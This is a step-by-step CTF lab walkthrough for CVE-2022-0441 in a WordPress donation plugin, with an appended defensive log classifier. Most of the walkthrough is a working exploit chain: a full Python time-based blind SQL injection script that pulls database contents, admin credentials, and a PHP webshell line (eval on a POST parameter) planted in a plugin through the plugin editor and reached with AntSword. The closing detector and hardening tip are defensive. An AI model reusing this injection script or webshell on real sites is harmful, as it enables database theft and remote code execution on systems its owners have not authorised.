Chunqiu Cloud Range (春秋云境) CVE-2022-0441 (step-by-step tutorial)

1. Read the range introduction

From the introduction we can see that the vulnerability comes from a plugin. The concrete idea is: edit a plugin's script, turn it into a webshell, activate the plugin, and finally connect to the webshell with China AntSword (中国蚁剑). With that plan in mind, let's get started.

2. Start the range

After starting the range we get the page shown in the screenshot. The blogger also did some extra testing of the page without getting any useful result, so here we append /admin directly to find the backend. Many of you have been stuck at this point before: weak passwords, blank passwords and brute force all fail to give a working account/password for the backend. The blogger used a script to get into the backend; you can use it for reference (the code below is the blogger's, with the quotes and operators the extraction had stripped restored):

```python
import requests
import time


def time_delay(url, headers, payload):
    # Time one POST request; the difference tells us whether sleep(10) fired
    start_time = time.time()
    response = requests.post(url, headers=headers, data=payload)
    end_time = time.time()
    # print(end_time, start_time)
    delay = end_time - start_time
    return delay


def time_based_blind_sql_injection(url, headers):
    result = []
    for i in range(1, 100):
        for j in range(32, 126):  # r'0123456789abcdefghijklmnopqrstuvwxyz_-{}'
            # find db
            # payload = {'id': "(if((substr(database(),%d,1))='%s',sleep(10),1))#" % (i, j)}
            # find table
            # payload = {'id': "(if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))=%d,sleep(10),1))#" % (i, j)}
            # find table - wp%
            payload = {'id': "(if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database() and table_name not like 0x777025),%d,1))=%d,sleep(10),1))#" % (i, j)}
            # find column
            # payload = {'id': "(if(ascii(substr((select count(column_name) from information_schema.columns where table_name='flag'),%d,1))=%d,sleep(10),1))#" % (i, j)}
            payload = {'id': "(if(ascii(substr((select flag from ctf.flag),%d,1))=%d,sleep(10),1))#" % (i, j)}
            delay = time_delay(url, headers, payload)
            print('{', ','.join(result), '}', '-', i, '-', j, 'time_delay:', delay)
            if delay > 9:
                # The response was delayed, so character i has ASCII value j
                result.append(chr(j))
                print(''.join(result))
                break
        else:
            # No character in the range produced a delay at this position
            print("The payload is not vulnerable to SQL injection.")
    print('result:', ''.join(result))


if __name__ == '__main__':
    url = 'https://eci-2zecxtkbjkqos2volkuy.cloudeci1.ichunqiu.com/index.php?rest_route=/xs-donate-form/payment-redirect/3'
    headers = {
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Cookie': '_ga=GA1.2.617032228.1689668529; _ga_J1DQF09WZC=GS1.2.1689668531.1.0.1689668531.0.0.0',
        'Connection': 'close',
        'Content-Type': 'application/json',
    }
    time_based_blind_sql_injection(url, headers)
```

Paste the code above into the IDLE Python editor, then run it as follows: press Win+R, type cmd, and run the script from the command prompt. The file path and the URL will differ for each of you, so change them to match your own environment. When output like the screenshot appears, it proves the run succeeded.

Then we go back to the login page, where we can log in to the backend with the account/password: david@domainexample.com / Admin123. Here we need to click Update, after which we get to the screen shown below. If you get stuck on the previous screen and cannot get in, make sure you keep using the https protocol.

Next we find Plugins, then click Plugin Editor as shown in the screenshot. Click "I understand". Then select this option in the area on the right, and in the code on the left enter the following:

```php
eval($_POST['cmd']);
```

Then click Update File. After it completes it shows the confirmation, and we go back to Installed Plugins, find Hello Dolly (你好多莉) and click Activate.

3. Webshell stage

Launch China AntSword (中国蚁剑) with the URL path https://eci-2ze9foj8a8eqorl8isl6.cloudeci1.ichunqiu.com/wp-admin/plugin-editor.php?file=hello.php. Once in, we can easily find the flag, our big prize.

With that, I trust you clever, handsome and beautiful readers have cracked another range. Thank you for your valuable time. Creating content is not easy, so if you like the blogger, a like, favorite and follow would be appreciated. If anything is unclear, leave a comment and the blogger will answer each one. If there is any range you would like the blogger to tackle, leave a comment too.
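As an added defensive example (not part of the original post), here is a small Python classifier that flags the two request shapes this walkthrough depends on: time-based blind SQL injection probes against the donate-form REST route, and a plugin-editor write that introduces eval(). The request records and their field names are constructed for this example and are assumptions, not a real log format.

```python
import re
from urllib.parse import unquote_plus

# Constructed request records, roughly what a WAF or application log could
# capture: method, path, raw body and server-side processing time (ms).
SAMPLE_REQUESTS = [
    {"method": "POST", "path": "/index.php?rest_route=/xs-donate-form/payment-redirect/3",
     "body": "id=(if(ascii(substr((select flag from ctf.flag),1,1))=102,sleep(10),1))%23",
     "took_ms": 10040},
    {"method": "POST", "path": "/index.php?rest_route=/xs-donate-form/payment-redirect/3",
     "body": "id=3", "took_ms": 120},
    {"method": "POST", "path": "/wp-admin/plugin-editor.php",
     "body": "file=hello.php&newcontent=%3C%3Fphp+eval%28%24_POST%5B%27cmd%27%5D%29%3B",
     "took_ms": 90},
    {"method": "POST", "path": "/wp-admin/plugin-editor.php",
     "body": "file=hello.php&newcontent=%3C%3Fphp+echo+%27hi%27%3B", "took_ms": 80},
]

# Fragments characteristic of the timing payloads used in the walkthrough.
SQLI_TIME_PATTERNS = [
    re.compile(r"\bsleep\s*\(", re.I),
    re.compile(r"\bbenchmark\s*\(", re.I),
    re.compile(r"\bif\s*\(\s*ascii\s*\(\s*substr", re.I),
    re.compile(r"information_schema", re.I),
]
# PHP calls that should never land in a plugin file through the editor.
DANGEROUS_PHP = re.compile(r"\b(eval|system|passthru|shell_exec|assert)\s*\(", re.I)


def classify(req, slow_ms=5000):
    """Return the list of alert tags raised by one request record."""
    alerts = []
    body = unquote_plus(req["body"])  # decode %xx and '+' before matching
    if any(p.search(body) for p in SQLI_TIME_PATTERNS):
        alerts.append("sqli-time-based-payload")
    # A REST call that takes seconds is the side channel the attack relies on.
    if req["took_ms"] >= slow_ms and "rest_route=" in req["path"]:
        alerts.append("slow-rest-request")
    if req["method"] == "POST" and req["path"].endswith("/wp-admin/plugin-editor.php"):
        if DANGEROUS_PHP.search(body):
            alerts.append("plugin-editor-writes-eval")
        else:
            alerts.append("plugin-editor-write")  # still worth an audit entry
    return alerts


def scan(records):
    """Map record index -> alerts for every record that raised at least one."""
    found = {}
    for i, rec in enumerate(records):
        alerts = classify(rec)
        if alerts:
            found[i] = alerts
    return found
```

On a real WordPress site, adding define('DISALLOW_FILE_EDIT', true); to wp-config.php removes the plugin editor this walkthrough uses, and repeated multi-second requests to one REST route are a cheap first-pass signal for the timing attack.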